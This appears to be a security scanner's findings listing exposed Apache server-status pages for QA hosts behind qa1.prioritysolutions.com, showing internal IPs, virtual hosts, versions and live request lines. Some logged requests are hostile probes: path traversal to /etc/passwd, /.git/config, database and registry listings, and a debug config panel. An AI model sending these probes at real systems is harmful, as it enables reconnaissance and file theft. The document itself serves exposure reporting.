127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 24-0215860/0/1299_ 0.0011901103640.00.0029.55 10.253.106.161http/1.1 25-0230690/0/1351_ 0.00101141680.00.0018.38 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 26-0160842/9/1105K 0.01414860212.30.0314.57 10.253.106.216http/1.1www-qa.patheon.kr:80GET /akamai/sureroute-test-object.html HTTP/1.1 27-0230700/0/1152_ 0.00101937950.00.0021.46 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 28-0230710/0/1023_ 0.00101436030.00.0018.89 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 29-0197900/1/1863R 0.0064101081180.00.0026.99 10.253.106.216http/1.1 30-0215870/0/1107_ 0.0011801894530.00.0016.44 10.253.106.161http/1.1 31-0215880/0/1086_ 0.0011901384010.00.0026.81 10.253.106.161http/1.1 32-0230720/0/1473_ 0.0010863560.00.0040.02 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 33-0230730/0/1105_ 0.0010897490.00.0021.12 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 34-0223380/0/1238_ 0.003360984910.00.0020.26 10.253.106.216http/1.1 35-0230740/0/1927_ 0.00104020360.00.0020.64 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 36-0197920/0/904R 0.0065101608450.00.0011.09 10.253.106.161http/1.1 37-0176220/14/1157R 0.0164201392620.00.0530.20 10.253.106.216http/1.1 38-0197930/0/1208R 0.003480949040.00.0024.60 10.253.106.216http/1.1 39-0197980/0/1231R 0.0034801307720.00.0024.87 10.253.106.216http/1.1 40-0215910/1/1692_ 0.001071555480.00.0242.87 10.253.106.216http/1.1 41-0230750/0/1041_ 0.00101250560.00.0018.65 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 42-0230780/0/1306_ 0.00001531320.00.0023.37 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 43-0230790/0/1241_ 0.00001421830.00.0023.45 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 44-0223430/0/1211_ 0.0033601308040.00.0016.86 10.253.106.216http/1.1 45-0223440/0/1232_ 0.003360961370.00.0027.79 10.253.106.216http/1.1 46-0223450/0/1348_ 0.0033601268490.00.0028.71 10.253.106.216http/1.1 47-0170500/0/1153R 0.0065101325120.00.0016.15 10.253.106.161http/1.1 48-0230800/0/1130_ 0.00001278470.00.0067.37 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 49-0206391/1/1288K 0.005171812141.40.0046.17 10.253.106.161http/1.1qa1-corporate.thermofisher.com:GET /akamai/sureroute-test-object.html HTTP/1.1 50-0170510/4/1067R 0.006410877410.00.0122.51 10.253.106.216http/1.1 51-0230810/0/1042_ 0.00001278260.00.0020.99 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 52-0230820/0/1293_ 0.00001244100.00.0022.90 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 53-0230830/0/1194_ 0.00001638100.00.0033.16 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 54-0206428/14/1415K 0.0201316752411.10.0723.35 10.253.106.216http/1.1www-qa.patheon.kr:80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e312879ce312879cfb9021d7
Apache Status Apache Server Status for qa1.prioritysolutions.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Wednesday, 23-Aug-2023 01:25:00 EDT Restart Time: Tuesday, 15-Aug-2023 10:38:23 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 7 days 14 hours 46 minutes 37 seconds Server load: 0.11 0.04 0.01 Total accesses: 211560 - Total Traffic: 2.1 GB - Total Duration: 9292340 CPU Usage: u50.66 s90.11 cu267.82 cs71.07 - .0729% CPU load .322 requests/sec - 3402 B/second - 10.3 kB/request - 43.923 ms/request 36 requests currently being processed, 36 idle workers ___KKR_K__K__K____R_K_RRR_KR_RK_RR_R__RKK_KKRK_K_RR_RRR____K_W__ __RR___..R...................................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0151360/1/1032_ 0.0015111798630.00.0161.22 10.253.106.161http/1.1 1-0151370/1/1148_ 0.0010801586060.00.0045.76 10.253.106.161http/1.1 2-0151380/2/1034_ 0.014801385060.00.0242.95 10.253.106.161http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/headlibs-global.min.2020. 3-017261264/65800/65800K 39.914040021120565.0117.74117.74 10.253.106.161http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 4-017262264/65800/65800K 39.961039812120564.5117.74117.74 10.253.106.216http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 5-0151750/5/1221R 0.0540210896350.01.6127.75 10.253.106.161http/1.1 6-0186270/1/1089_ 0.00556819610.00.0216.79 10.253.106.216http/1.1qa1.thermofisher.in:80GET /chemicals/en/contact-us.html HTTP/1.1 7-0151857/16/1114K 0.0111106339113.40.0727.73 10.253.106.216http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/print.min.2023.7.1.428.cs 8-0120000/13/1208_ 0.01118131472030.00.0347.29 10.253.106.161http/1.1 9-0120010/1/1116_ 0.002700959720.00.0030.84 10.253.106.216http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/headlibs-global.min.2020. 10-01483921/21/1099K 0.031280155130197.40.1923.40 10.253.106.161http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/common.min.2022.6.17.419. 11-0169790/2/1404_ 0.01109171297190.00.0432.26 10.253.106.216http/1.1 12-0169800/0/1202_ 0.002420855510.00.0025.61 10.253.106.161http/1.1 13-0158562/7/1180K 0.021111414555247.10.0528.39 10.253.106.161http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/headlibs.min.2023.7.1.428 14-0186280/0/1140_ 0.00550798710.00.0021.04 10.253.106.216http/1.1 15-0104440/29/1360_ 0.30270192543040.00.5332.87 10.253.106.161http/1.1 16-0186290/0/1097_ 0.00480926760.00.0024.60 10.253.106.161http/1.1 17-0130410/0/813_ 0.002470871280.00.0012.88 10.253.106.161http/1.1 18-0186300/0/1141R 0.0057301850720.00.0021.46 10.253.106.216http/1.1 19-0189660/0/1282_ 0.0012801552560.00.0015.07 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 20-0186325/5/1033K 0.00239212619212.60.0120.86 10.253.106.216http/1.1qa1.unitylabservices.com:80GET /en/home.html HTTP/1.1 21-0169850/2/1187_ 0.001101721808070.00.0946.23 10.253.106.161http/1.1 22-0186330/0/1044R 0.0057301140960.00.0018.28 10.253.106.161http/1.1 23-0186340/0/1165R 0.0057201935170.00.0026.75 10.253.106.216http/1.1 24-0186350/0/1085R 0.005720935000.00.0021.97 10.253.106.161http/1.1 25-095830/2/1173_ 0.0027013904490.00.0015.21 10.253.106.161http/1.1 26-0148431/1/963K 0.001280749841.70.0012.97 10.253.106.216http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/mobilelibs.min.2022.6.17. 27-0186360/0/1050R 0.0057201919090.00.0020.02 10.253.106.216http/1.1 28-0148440/18/922_ 0.16238171342210.00.5017.70 10.253.106.216http/1.1qa1.allergyinsider.com:80GET /akamai/sureroute-test-object.html HTTP/1.1 29-095850/74/1719R 0.095740969530.01.5025.73 10.253.106.216http/1.1 30-01698729/29/978K 0.0527013149597244.00.2415.09 10.253.106.161http/1.1qa1-designsystem.thermofisher.cGET /akamai/sureroute-test-object.html HTTP/1.1 31-0158600/0/959_ 0.0024201354050.00.0024.58 10.253.106.161http/1.1 32-0186370/0/1200R 0.005720772120.00.0030.98 10.253.106.216http/1.1 33-0148450/0/1000R 0.004020865810.00.0020.73 10.253.106.216http/1.1 34-0158610/6/976_ 0.0127142622390.00.0314.73 10.253.106.216http/1.1qa1.thermofisher.in:80GET /Akamai/sureroute-test-object.html HTTP/1.1 35-0186380/0/1740R 0.0057203895260.00.0017.47 10.253.106.216http/1.1 36-0158620/1/807_ 0.04109451492360.00.0710.46 10.253.106.161http/1.1 37-0158630/6/962_ 0.124801242110.00.4022.33 10.253.106.161http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/headlibs.min.2020.1.0.css 38-0186390/0/1073R 0.005720817210.00.0023.56 10.253.106.216http/1.1 39-0120084/31/1038K 0.03213927326.60.0820.23 10.253.106.216http/1.1qa1-chemicals.thermofisher.co.kGET /shared-static/html/akamai-sureroute-test-object.html HTTP/ 40-0186401/1/1507K 0.0013601400951.20.0035.34 10.253.106.216http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/print.min.2020.1.0.css HT 41-0120090/5/887_ 0.01238181172920.00.0314.06 10.253.106.216http/1.1 42-0158645/8/1141K 0.01111014483722.10.0520.28 10.253.106.216http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/mobilelibs.min.2023.7.1.4 43-0158653/13/1081K 0.03111010527324.20.1120.49 10.253.106.161http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/common.min.2023.7.1.428.j 44-0186410/0/1072R 0.0057201158100.00.0015.95 10.253.106.161http/1.1 45-0676313/38/1009K 0.10105087755131.61.8122.88 10.253.106.216http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/diagnostics/components/structure/phadia_foo 46-0158660/15/1219_ 0.024501234740.00.2626.96 10.253.106.216http/1.1qa1.thermofisher.in:80GET /chemicals/en/contact-us/jcr%3acontent/content-par-main/col 47-0187005/5/966K 0.00104011135940.70.0410.83 10.253.106.161http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/diagnostics/components/structure/phadia_hea 48-0158670/0/1010_ 0.0012501263900.00.0066.67 10.253.106.161http/1.1 49-0173710/0/1012R 0.0027101664930.00.0040.07 10.253.106.161http/1.1 50-0187130/0/896R 0.003700570310.00.0017.50 10.253.106.161http/1.1 51-0158680/4/867_ 0.0110801222290.00.1019.41 10.253.106.161http/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e312879ce312879c7fe5a284
Apache Status Apache Server Status for qa1.prioritysolutions.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Monday, 21-Aug-2023 20:18:41 EDT Restart Time: Tuesday, 15-Aug-2023 10:38:23 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 6 days 9 hours 40 minutes 18 seconds Server load: 0.00 0.00 0.00 Total accesses: 177229 - Total Traffic: 1.8 GB - Total Duration: 8244287 CPU Usage: u44.77 s76.38 cu223.21 cs58.11 - .0728% CPU load .32 requests/sec - 3525 B/second - 10.7 kB/request - 46.5177 ms/request 68 requests currently being processed, 30 idle workers K_RKKKK_KKRKKRRKKKKKKWK_RRKRKKRKRKRRKKKRKRWRRKKRRWRWRRKRKRRKRR_K KRR_R__KRRR_______________________.............................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0140191/1/832K 0.0035903164605220.30.2260.02 10.253.106.161http/1.1www-qa.patheon.com:80GET /us/en/insights-resources/sites.html HTTP/1.1 1-0121720/5/922_ 0.01349771369550.00.0241.04 10.253.106.161http/1.1qa1.allergyinsider.com:80GET /%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c% 2-099330/52/883R 0.07349141327400.02.0641.64 10.253.106.216http/1.1 3-01726155322/55322/55322K 33.494033597101331.798.9698.96 10.253.106.161http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 4-01726255322/55322/55322K 33.542033435101331.298.9698.96 10.253.106.216http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 5-0121761/3/1022K 0.01448785687616.40.0222.00 10.253.106.161http/1.1www-qa.patheon.com:80GET /us/en/our-capabilities/large-molecule.html HTTP/1.1 6-01067937/63/940K 0.090167296991.60.1313.97 10.253.106.161http/1.1qa1-corporate.thermofisher.com:GET /login.action HTTP/1.1 7-0123730/11/935_ 0.0262254589460.00.1223.87 10.253.106.161http/1.1qa1.allergyinsider.com:80GET /index.php?folder=../../../../etc/passwd&option=com_imagebr 8-0131254/11/963K 0.017237713437334.80.0444.17 10.253.106.161http/1.1www-qa.patheon.cn:80GET /our-capabilities HTTP/1.1 9-0106862/15/817K 0.02723586929334.20.0521.81 10.253.106.161http/1.1www-qa.patheon.com:80GET /us/en/home/terms-of-use.html HTTP/1.1 10-0123740/14/903R 0.0147541433510.00.0219.63 10.253.106.161http/1.1 11-0140291/1/1161K 0.014442411385513.80.0128.52 10.253.106.161http/1.1www-qa.patheon.com:80GET /us/en/insights-resources/meet-the-experts.html HTTP/1.1 12-0140301/1/992K 0.00357668021320.70.0223.54 10.253.106.161http/1.1www-qa.patheon.com:80GET /us/en/about-us.html HTTP/1.1 13-074210/60/973R 0.24345121381220.02.2224.70 10.253.106.216http/1.1 14-0106920/11/937R 0.0046613557890.00.0114.49 10.253.106.161http/1.1 15-0140431/1/1156K 0.013562024213818.10.0231.09 10.253.106.161http/1.1www-qa.patheon.com:80GET /us/en/innovative-solutions/manufacturing.html HTTP/1.1 16-025371/9/947K 0.01539458552913.60.0216.23 10.253.106.161http/1.1www-qa.patheon.com:80GET /us/en/about-us/contact-us.html HTTP/1.1 17-0110551/25/679K 0.02542297752814.60.0411.06 10.253.106.161http/1.1www-qa.patheon.com:80GET /us/en/global-network.html HTTP/1.1 18-0140472/2/880K 0.0123514718522.40.0216.36 10.253.106.161http/1.1qa1.allergyinsider.com:80GET /pentaho/api/ldap/config/ldapTreeNodeChildren/require.js?mg 19-01404817/17/1085K 0.0204614270249.40.0513.38 10.253.106.161http/1.1qa1.allergyinsider.com:80GET /_all_dbs HTTP/1.1 20-0140491/1/864K 0.007229411827489.00.0919.34 10.253.106.161http/1.1www-qa.patheon.com:80GET /akamai/sureroute-test-object.html HTTP/1.1 21-0140680/0/987W 0.00901491350.00.0045.37 10.253.106.161http/1.1www-qa.patheon.com:80GET /us/en/insights-resources.html HTTP/1.1 22-089872/23/762K 0.035719134016.80.0412.44 10.253.106.161http/1.1qa1.allergyinsider.com:80POST /texteditor.php HTTP/1.1 23-0123750/8/944_ 0.014451615010.00.0220.16 10.253.106.161http/1.1qa1.allergyinsider.com:80GET /photoalbum/index.php?url=../../../../../../../../../../../ 24-091500/14/910R 0.0130915805450.00.0217.25 10.253.106.161http/1.1 25-081530/10/1046R 0.013822807240.00.0314.48 10.253.106.216http/1.1 26-091842/14/775K 0.03362875741238.20.0811.56 10.253.106.161http/1.1www-qa.patheon.com:80GET /us/en/our-capabilities/advanced-therapies.html HTTP/1.1 27-0123780/5/863R 0.00177141837550.00.0114.47 10.253.106.216http/1.1 28-091852/15/755K 0.044505511806525.20.0915.32 10.253.106.161http/1.1www-qa.patheon.com:80GET /us/en/our-capabilities/commercial-services.html HTTP/1.1 29-0123817/28/1416K 0.047548187310.00.9221.29 10.253.106.161http/1.1qa1.allergyinsider.com:80POST /op/op.Login.php HTTP/1.1 30-0110980/13/798R 0.01483131269060.00.0212.30 10.253.106.161http/1.1 31-0140771/1/795K 0.013477912909019.50.0221.90 10.253.106.161http/1.1www-qa.patheon.cn:80GET /innovative-solutions HTTP/1.1 32-081570/23/1018R 0.153468647650.00.4425.32 10.253.106.216http/1.1 33-0110991/29/844K 0.029170607466.10.4914.22 10.253.106.216http/1.1www-qa.patheon.cn:80GET /etc.clientlibs/multisitecommons/clientlibs/vendor/less.min 34-0140780/0/867R 0.0080578750.00.0013.77 10.253.106.161http/1.1 35-0108270/16/1614R 0.0137943729690.00.0415.48 10.253.106.216http/1.1 36-01238226/30/679K 0.03025131515274.40.279.00 10.253.106.216http/1.1qa1.allergyinsider.com:80GET /debug/default/view?panel=config HTTP/1.1 37-0131267/11/846K 0.024348311351836.90.0420.89 10.253.106.161http/1.1www-qa.patheon.jp:80GET /home HTTP/1.1 38-0140791/1/871K 0.00637625321.50.0019.39 10.253.106.161http/1.1qa1.allergyinsider.com:80POST /wp-content/plugins/wp-payeezy-pay/donate.php HTTP/1.1 39-0140800/0/827R 0.0070787220.00.0018.01 10.253.106.161http/1.1 40-096461/37/1147K 0.060896711672235.20.2334.06 10.253.106.161http/1.1www-qa.patheon.com:80GET /us/en/our-capabilities/clinical-trial-services.html HTTP/1 41-0108480/25/701R 0.0229151028680.00.039.85 10.253.106.161http/1.1 42-0965031/58/998W 0.5300133589874.01.3615.87 10.253.106.216http/1.1www-qa.patheon.kr:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 43-029680/38/962R 0.34358121029360.01.0619.37 10.253.106.161http/1.1 44-096510/16/926R 0.0137931062260.00.0212.48 10.253.106.216http/1.1 45-053281/18/866K 0.04720168139189.00.2620.60 10.253.106.161http/1.1www-qa.patheon.com:80GET /akamai/sureroute-test-object.html HTTP/1.1 46-01270520/30/969K 0.0603410610192.40.1021.62 10.253.106.161http/1.1qa1.allergyinsider.com:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 47-096530/20/890R 0.1836091051230.00.4010.41 10.253.106.216http/1.1 48-0131270/1/896R 0.0035601239640.00.0065.48 10.253.106.161http/1.1 49-0279293/101/932
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e312879ce312879cd89dc63f
Apache Status Apache Server Status for qa1.prioritysolutions.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Monday, 21-Aug-2023 20:18:42 EDT Restart Time: Tuesday, 15-Aug-2023 10:38:23 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 6 days 9 hours 40 minutes 19 seconds Server load: 0.00 0.00 0.00 Total accesses: 177250 - Total Traffic: 1.8 GB - Total Duration: 8263308 CPU Usage: u44.83 s76.38 cu223.21 cs58.11 - .0728% CPU load .32 requests/sec - 3525 B/second - 10.7 kB/request - 46.6195 ms/request 68 requests currently being processed, 30 idle workers K_RKKKK_KKRKKRRKKKKKK_K_RRKRKKRKRKRRWKKRKRWRRKKRR_RKRRKRKRRKRRRK KRRWR__KRRR_______________________.............................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0140191/1/832K 0.0035903164605220.30.2260.02 10.253.106.161http/1.1www-qa.patheon.com:80GET /us/en/insights-resources/sites.html HTTP/1.1 1-0121720/5/922_ 0.01449771369550.00.0241.04 10.253.106.161http/1.1qa1.allergyinsider.com:80GET /%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c% 2-099330/52/883R 0.07350141327400.02.0641.64 10.253.106.216http/1.1 3-01726155322/55322/55322K 33.495033597101331.798.9698.96 10.253.106.161http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 4-01726255322/55322/55322K 33.542033435101331.298.9698.96 10.253.106.216http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 5-0121761/3/1022K 0.01448785687616.40.0222.00 10.253.106.161http/1.1www-qa.patheon.com:80GET /us/en/our-capabilities/large-molecule.html HTTP/1.1 6-01067937/63/940K 0.090167296991.60.1313.97 10.253.106.161http/1.1qa1-corporate.thermofisher.com:GET /login.action HTTP/1.1 7-0123730/11/935_ 0.0262254589460.00.1223.87 10.253.106.161http/1.1qa1.allergyinsider.com:80GET /index.php?folder=../../../../etc/passwd&option=com_imagebr 8-0131254/11/963K 0.017237713437334.80.0444.17 10.253.106.161http/1.1www-qa.patheon.cn:80GET /our-capabilities HTTP/1.1 9-0106862/15/817K 0.02723586929334.20.0521.81 10.253.106.161http/1.1www-qa.patheon.com:80GET /us/en/home/terms-of-use.html HTTP/1.1 10-0123740/14/903R 0.0147641433510.00.0219.63 10.253.106.161http/1.1 11-0140291/1/1161K 0.015442411385513.80.0128.52 10.253.106.161http/1.1www-qa.patheon.com:80GET /us/en/insights-resources/meet-the-experts.html HTTP/1.1 12-0140301/1/992K 0.00357668021320.70.0223.54 10.253.106.161http/1.1www-qa.patheon.com:80GET /us/en/about-us.html HTTP/1.1 13-074210/60/973R 0.24346121381220.02.2224.70 10.253.106.216http/1.1 14-0106920/11/937R 0.0046613557890.00.0114.49 10.253.106.161http/1.1 15-0140431/1/1156K 0.014562024213818.10.0231.09 10.253.106.161http/1.1www-qa.patheon.com:80GET /us/en/innovative-solutions/manufacturing.html HTTP/1.1 16-025371/9/947K 0.01539458552913.60.0216.23 10.253.106.161http/1.1www-qa.patheon.com:80GET /us/en/about-us/contact-us.html HTTP/1.1 17-0110551/25/679K 0.02542297752814.60.0411.06 10.253.106.161http/1.1www-qa.patheon.com:80GET /us/en/global-network.html HTTP/1.1 18-0140472/2/880K 0.0123514718522.40.0216.36 10.253.106.161http/1.1qa1.allergyinsider.com:80GET /pentaho/api/ldap/config/ldapTreeNodeChildren/require.js?mg 19-01404817/17/1085K 0.0204614270249.40.0513.38 10.253.106.161http/1.1qa1.allergyinsider.com:80GET /_all_dbs HTTP/1.1 20-0140491/1/864K 0.007229411827489.00.0919.34 10.253.106.161http/1.1www-qa.patheon.com:80GET /akamai/sureroute-test-object.html HTTP/1.1 21-0140680/5/992_ 0.05091678200.00.1245.49 10.253.106.161http/1.1www-qa.patheon.jp:80GET /.git/config HTTP/1.1 22-089872/23/762K 0.036719134016.80.0412.44 10.253.106.161http/1.1qa1.allergyinsider.com:80POST /texteditor.php HTTP/1.1 23-0123750/8/944_ 0.014451615010.00.0220.16 10.253.106.161http/1.1qa1.allergyinsider.com:80GET /photoalbum/index.php?url=../../../../../../../../../../../ 24-091500/14/910R 0.0131015805450.00.0217.25 10.253.106.161http/1.1 25-081530/10/1046R 0.013832807240.00.0314.48 10.253.106.216http/1.1 26-091842/14/775K 0.03362875741238.20.0811.56 10.253.106.161http/1.1www-qa.patheon.com:80GET /us/en/our-capabilities/advanced-therapies.html HTTP/1.1 27-0123780/5/863R 0.00177141837550.00.0114.47 10.253.106.216http/1.1 28-091852/15/755K 0.044505511806525.20.0915.32 10.253.106.161http/1.1www-qa.patheon.com:80GET /us/en/our-capabilities/commercial-services.html HTTP/1.1 29-0123817/28/1416K 0.047648187310.00.9221.29 10.253.106.161http/1.1qa1.allergyinsider.com:80POST /op/op.Login.php HTTP/1.1 30-0110980/13/798R 0.01483131269060.00.0212.30 10.253.106.161http/1.1 31-0140771/1/795K 0.013477912909019.50.0221.90 10.253.106.161http/1.1www-qa.patheon.cn:80GET /innovative-solutions HTTP/1.1 32-081570/23/1018R 0.153478647650.00.4425.32 10.253.106.216http/1.1 33-0110991/29/844K 0.029170607466.10.4914.22 10.253.106.216http/1.1www-qa.patheon.cn:80GET /etc.clientlibs/multisitecommons/clientlibs/vendor/less.min 34-0140780/0/867R 0.0090578750.00.0013.77 10.253.106.161http/1.1 35-0108270/16/1614R 0.0138043729690.00.0415.48 10.253.106.216http/1.1 36-01238226/30/679W 0.0300131515274.40.279.00 10.253.106.216http/1.1qa1.allergyinsider.com:80GET /server-status HTTP/1.1 37-0131267/11/846K 0.025348311351836.90.0420.89 10.253.106.161http/1.1www-qa.patheon.jp:80GET /home HTTP/1.1 38-0140791/1/871K 0.00637625321.50.0019.39 10.253.106.161http/1.1qa1.allergyinsider.com:80POST /wp-content/plugins/wp-payeezy-pay/donate.php HTTP/1.1 39-0140800/0/827R 0.0080787220.00.0018.01 10.253.106.161http/1.1 40-096461/37/1147K 0.060896711672235.20.2334.06 10.253.106.161http/1.1www-qa.patheon.com:80GET /us/en/our-capabilities/clinical-trial-services.html HTTP/1 41-0108480/25/701R 0.0229151028680.00.039.85 10.253.106.161http/1.1 42-0965033/60/1000L 0.53012133657876.51.3615.87 10.253.106.216http/1.1qa1.allergyinsider.com:80GET /v2/_catalog HTTP/1.1 43-029680/38/962R 0.34359121029360.01.0619.37 10.253.106.161http/1.1 44-096510/16/926R 0.0138031062260.00.0212.48 10.253.106.216http/1.1 45-053281/18/866K 0.04720168139189.00.2620.60 10.253.106.161http/1.1www-qa.patheon.com:80GET /akamai/sureroute-test-object.html HTTP/1.1 46-01270520/30/969K 0.0603410610192.40.1021.62 10.253.106.161http/1.1qa1.allergyinsider.com:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 47-096530/20/890R 0.1836091051230.00.4010.41 10.253.106.216http/1.1 48-0131270/1/896R 0.0035701239640.00.0065.48 10.253.106.161http/1.1 49-0279290/105/936_ 0.880131594820.0
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e312879ce312879cd0a53615
Apache Status Apache Server Status for qa1.prioritysolutions.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Wednesday, 28-Jun-2023 15:14:49 EDT Restart Time: Wednesday, 28-Jun-2023 15:00:05 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 14 minutes 43 seconds Server load: 0.25 0.07 0.03 Total accesses: 1012 - Total Traffic: 23.0 MB - Total Duration: 1539042 CPU Usage: u1.2 s.61 cu.09 cs.08 - .224% CPU load 1.15 requests/sec - 26.7 kB/second - 23.3 kB/request - 1520.79 ms/request 164 requests currently being processed, 40 idle workers KKKKKKKKKKK_R__RRKKRRRKRRKKKRKKKKRKKKKRRRRRRKKRRKKKKKWK_KKKKKKKK KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK KRKKKKKKKKKKKKKKKKK_KKKKKKKKKKKKKKRK.KKR............K....___K___ _____________________________................................... ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0785288/88/88K 0.049051131.00.130.13 10.253.106.180http/1.1qa1-chemicals.thermofisher.co.kGET /server-status?auto HTTP/1.1 1-0785389/89/89K 0.043055132.10.130.13 10.253.106.199http/1.1qa1-chemicals.thermofisher.co.kGET /server-status?auto HTTP/1.1 2-078549/70/70K 0.126157591639937.40.240.24 10.253.106.180http/1.1www-qa.patheon.cn:80GET /global-network HTTP/1.1 3-0785551/217/217K 0.250555572179.10.470.47 10.253.106.199http/1.1www-qa.patheon.kr:80GET /server-status HTTP/1.1 4-078561/2/2K 0.005880311606816.30.330.33 10.253.106.180http/1.1www-qa.patheon.com:80GET /us/en/our-capabilities/large-molecule.html HTTP/1.1 5-078574/4/4K 0.0030328524.10.020.02 10.253.106.199http/1.1qa1-chemicals.thermofisher.co.kGET /diagnostic-education/etc/designs/diagnostics/vendor/font-a 6-078581/1/1K 0.0154116822336416.80.020.02 10.253.106.180http/1.1www-qa.patheon.com:80GET /us/en/our-capabilities/commercial-services.html HTTP/1.1 7-078594/4/4K 0.0143037350653.30.640.64 10.253.106.180http/1.1qa1-chemicals.thermofisher.co.kGET /etc.clientlibs/tfsite/clientlibs/clientlib-site.min.css HT 8-078601/1/1K 0.00633367673489.60.090.09 10.253.106.180http/1.1www-qa.patheon.com:80GET /us/en/newsroom/thermo-fisher-scientific-opens-viral-vector 9-078613/3/3K 0.0151502927222.90.020.02 10.253.106.180http/1.1www-qa.patheon.kr:80GET /akamai/sureroute-test-object.html HTTP/1.1 10-078621/1/1K 0.01303112221.90.020.02 10.253.106.199http/1.1qa1-chemicals.thermofisher.co.kGET /diagnostic-education/etc/designs/diagnostics/vendor/bootst 12-078640/0/0R 0.00536000.00.000.00 10.253.106.180http/1.1 15-078670/0/0R 0.00536000.00.000.00 10.253.106.180http/1.1 16-078680/0/0R 0.00536000.00.000.00 10.253.106.180http/1.1 17-078694/4/4K 0.00259088447.20.050.05 10.253.106.180http/1.1qa1-chemicals.thermofisher.co.kGET / HTTP/1.1 18-078702/2/2K 0.0030416584.00.000.00 